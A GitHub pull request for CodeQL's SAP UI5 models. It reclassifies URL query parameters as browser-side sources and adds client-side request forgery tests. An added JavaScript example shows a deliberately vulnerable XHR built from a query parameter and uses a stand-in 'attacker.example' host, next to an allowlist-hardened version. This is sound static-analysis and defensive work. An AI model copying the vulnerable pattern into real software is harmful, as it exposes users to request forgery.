
Client side request forgery from jQuery.sap.getUriParameters()#312

Open
mbaluda wants to merge 11 commits into main from mbaluda/xsrf-tests

Conversation

@mbaluda (Contributor) commented Feb 25, 2026

  • Improves the data extension for SAP UI5 to more accurately model browser URL query sources and adds new tests for request forgery vulnerabilities.
  • Based on the MaD input kind browser-url-query, the alert is now correctly classified as "ClientSideRequestForgery" and not as "RequestForgery"
  • Updates version number to 2.25.0

@mbaluda mbaluda self-assigned this Feb 25, 2026
@mbaluda mbaluda changed the base branch from main to mbaluda/df-clean March 11, 2026 18:24
@mbaluda mbaluda changed the base branch from mbaluda/df-clean to main March 11, 2026 18:25
Copilot AI (Contributor) left a comment

Pull request overview

Updates SAP UI5 source modeling to treat URL query parameters as browser-derived inputs and adds regression tests ensuring request-forgery alerts are classified as client-side rather than server-side.

Changes:

  • Model UI5URIParameters.get/getAll return values as browser-url-query sources in the UI5 data extension.
  • Add UI5 test cases asserting ClientSideRequestForgery fires (and RequestForgery does not) for URL-query-controlled XHR.
  • Bump codeql/javascript-all (and internal pack dependencies) to align packs/tests with the new modeling.

Reviewed changes

Copilot reviewed 22 out of 22 changed files in this pull request and generated no comments.

Summary per file (file, then description):
javascript/heuristic-models/tests/qlpack.yml Bump JS pack dependency versions used by heuristic-model tests.
javascript/heuristic-models/ext/qlpack.yml Update extension target codeql/javascript-all version range.
javascript/frameworks/xsjs/test/qlpack.yml Align XSJS tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/xsjs/src/qlpack.yml Align XSJS queries pack dependencies to updated versions.
javascript/frameworks/xsjs/lib/qlpack.yml Bump codeql/javascript-all dependency for XSJS “all” pack.
javascript/frameworks/xsjs/ext/qlpack.yml Update extension target codeql/javascript-all version range for XSJS models.
javascript/frameworks/ui5/test/queries/RequestForgery/test.js New minimal repro: URL query param flows into XHR request URL.
javascript/frameworks/ui5/test/queries/RequestForgery/RequestForgery.qlref New regression target for server-side RequestForgery query (expecting no result).
javascript/frameworks/ui5/test/queries/RequestForgery/RequestForgery.expected Expected output asserting no RequestForgery finding for browser URL-query input.
javascript/frameworks/ui5/test/queries/RequestForgery/ClientSideRequestForgery.qlref New regression target for ClientSideRequestForgery query.
javascript/frameworks/ui5/test/queries/RequestForgery/ClientSideRequestForgery.expected Expected output asserting a client-side request-forgery finding.
javascript/frameworks/ui5/test/qlpack.yml Align UI5 tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/ui5/test/models/source/sourceTest.expected Update expected source-kind classification for UI5 URL parameter sources.
javascript/frameworks/ui5/src/qlpack.yml Align UI5 queries pack dependencies to updated versions.
javascript/frameworks/ui5/lib/qlpack.yml Bump codeql/javascript-all dependency for UI5 “all” pack.
javascript/frameworks/ui5/ext/ui5.model.yml Change UI5 URI parameter sources to browser-url-query.
javascript/frameworks/ui5/ext/qlpack.yml Update extension target codeql/javascript-all version range for UI5 models.
javascript/frameworks/ui5-webcomponents/test/qlpack.yml Align UI5-webcomponents tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/cap/test/qlpack.yml Align CAP tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/cap/src/qlpack.yml Align CAP queries pack dependencies to updated versions.
javascript/frameworks/cap/lib/qlpack.yml Bump codeql/javascript-all dependency for CAP “all” pack.
javascript/frameworks/cap/ext/qlpack.yml Update extension target codeql/javascript-all version range for CAP models.
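The flow these tests cover, written out as an added example (not the PR's test.js and not UI5 or CodeQL code): a query-string value read through the UI5 UriParameters API ends up as the URL of an XHR, which is the client-side request forgery the ClientSideRequestForgery query now reports for browser-url-query sources. The `uriParametersFromQuery` stand-in for `jQuery.sap.getUriParameters()` / `UriParameters.fromQuery()` (only `get` and `getAll`), the `target`/`id` parameter names, the `ALLOWED_ENDPOINTS` table and the `sendXhr` stub are assumptions made so the example runs in Node without a browser.

```javascript
// Stand-in for the UI5 UriParameters object (get = first value, getAll = every
// value), assumed here so the example runs offline; real code calls
// jQuery.sap.getUriParameters() or sap/base/util/UriParameters.fromQuery().
function uriParametersFromQuery(search) {
  const params = new URLSearchParams(search);
  return {
    get: (name) => params.get(name),       // first value or null
    getAll: (name) => params.getAll(name), // array of all values
  };
}

// Vulnerable pattern: the raw browser-url-query value becomes the request
// URL. A link like ?target=https://attacker.example/ sends the XHR wherever
// the attacker chose, with the victim's cookies if the target is same-site.
function buildRequestUrlUnsafe(uriParams) {
  return uriParams.get("target");
}

// Hardened form: the query value may only select an entry of a fixed
// allowlist, user data goes into a query parameter rather than the path,
// and the resolved URL must stay on the application's own origin.
const ALLOWED_ENDPOINTS = {
  orders: "/api/orders",
  products: "/api/products",
};

function buildRequestUrlSafe(uriParams, appOrigin) {
  const key = uriParams.get("target");
  if (!Object.prototype.hasOwnProperty.call(ALLOWED_ENDPOINTS, key)) {
    return null; // unknown or missing target: refuse rather than guess
  }
  const url = new URL(ALLOWED_ENDPOINTS[key], appOrigin);
  const id = uriParams.get("id");
  if (id !== null) {
    url.searchParams.set("id", id); // encoded, cannot alter path or host
  }
  if (url.origin !== new URL(appOrigin).origin) {
    return null; // belt and braces: never leave the app origin
  }
  return url.toString();
}

// XHR stub so the data flow is visible end to end: returns the request it
// would issue instead of performing it.
function sendXhr(url) {
  if (url === null) {
    throw new Error("refused: request target not allowlisted");
  }
  return { method: "GET", url };
}

// Constructed inputs: an attacker-crafted link and a legitimate one.
const ATTACKER_QUERY = "?target=https://attacker.example/steal";
const LEGIT_QUERY = "?target=orders&id=42";
const APP_ORIGIN = "https://app.example";

function demo() {
  return {
    unsafe: sendXhr(buildRequestUrlUnsafe(uriParametersFromQuery(ATTACKER_QUERY))).url,
    safe: sendXhr(buildRequestUrlSafe(uriParametersFromQuery(LEGIT_QUERY), APP_ORIGIN)).url,
    blocked: buildRequestUrlSafe(uriParametersFromQuery(ATTACKER_QUERY), APP_ORIGIN),
  };
}
```

Run with `node` and call `demo()`: the unsafe builder hands the attacker's URL straight to the XHR, the safe builder maps `orders` to the fixed endpoint on the app origin, and the attacker's query yields `null` so `sendXhr` refuses it. Note that `getAll` returns every repeated value, so a model that covers only `get` would miss `?target=orders&target=https://attacker.example/` if the code reads the last element; the PR models both.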

@mbaluda mbaluda changed the title DRAFT: XSRF tests Client side request forgery from jQuery.sap.getUriParameters().get() Mar 24, 2026
@mbaluda mbaluda marked this pull request as ready for review March 24, 2026 08:49
@mbaluda mbaluda changed the title Client side request forgery from jQuery.sap.getUriParameters().get() Client side request forgery from jQuery.sap.getUriParameters() Mar 24, 2026
@mbaluda mbaluda enabled auto-merge (squash) March 24, 2026 10:55

2 participants